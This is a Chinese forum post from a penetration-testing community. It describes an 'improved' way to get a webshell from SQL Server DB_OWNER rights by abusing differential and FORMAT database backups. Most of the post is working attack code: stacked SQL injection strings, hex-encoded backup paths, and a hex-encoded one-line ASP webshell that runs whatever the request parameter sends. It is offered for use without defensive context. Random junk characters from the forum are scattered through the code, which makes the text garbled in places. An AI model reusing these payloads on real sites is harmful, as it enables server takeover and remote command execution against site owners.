找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 DB_OWNER权限得到webshell的改进办法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2096|回复: 0
打印 上一主题 下一主题

DB_OWNER权限得到webshell的改进办法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-11-9 21:31:07 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
DB_OWNER权限得到webshell的两点改进:* b# }- Y8 k0 v! f

: [- w4 R" ]; v2 U; Z减少备份文件大小,得到可执行的webshell成功率提高不少
3 Z# p8 a$ I4 y( E' k4 F2 D一利用差异备份+ G* [. a; |- |" o* M
加一个参数WITH DIFFERENTIAL2 ^! l& w" P7 ]+ g; b- R

7 \' e3 B8 l8 O5 N- ^1! k6 J3 C' L+ Q' P% q6 Q& S3 @
2
2 t* |% t# g+ G/ X" _& j2 t3
- D/ m" T7 J$ A4
8 \; E4 Q) Q+ e2 I  b8 F( u declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s, Z5 {4 ]1 L  n& V7 ^! T
create table [dbo].[xiaolu] ([cmd] [image]);9 T7 B) B  ?4 Z% e  ^
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)2 n1 n) ^. ]2 B2 ^. a+ B
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL ' |4 m$ V% _, r% P. Y

8 a/ f0 ]( d$ d: H8 I6 v- x二利用完全FORMAT
( r; b. S/ c# g' U! E加一个参数WITH FROMAT- u6 V0 }3 V8 I, u( d1 J: e0 ]
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以* y# L' I9 t, w9 ^8 M  A* h0 \
7 d7 l& I5 L% [2 @
1
( G* i/ ?* ~5 c  S4 N2" f8 m$ i$ a: c1 z4 R$ Q1 E8 d
34 Y" Y8 H8 ~0 w/ a0 B0 }! |  `
43 e5 F  `2 z1 x, H% |
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
9 s  p7 e$ |6 p" d6 hcreate table [dbo].[xiaolu] ([cmd] [image]);' |; Z2 Z$ {2 G! ^" P# A! u
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
' U; t7 L4 m" `9 V; K# R3 Pdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
  Y* X" ~6 q; g' i# }/ y
9 D; Q3 a1 U* i! L. T% a* K总的来说就是那么简单几句,下面以备份数据库model为例子$ }% {' c( H! v" d1 l3 j2 K
1
% D. A" {5 R; ]& ~0 w; q0 q, E1 z- t' o4 h. a
1' F6 X2 g% O4 g- a3 k
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>') 0 E+ m* t" Y# q8 n, V- R

( a1 H; Q1 _! w8 t2 d( `2
4 P. |  j5 [1 L% ~) D5 W0 ]
! K! i1 t( t4 k4 R# `19 N. ?& Z) X. Y* B
id=1;backup database model to disk='你的路径‘ with differential,format;--
  v6 G/ L; J0 g3 F" w! G
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表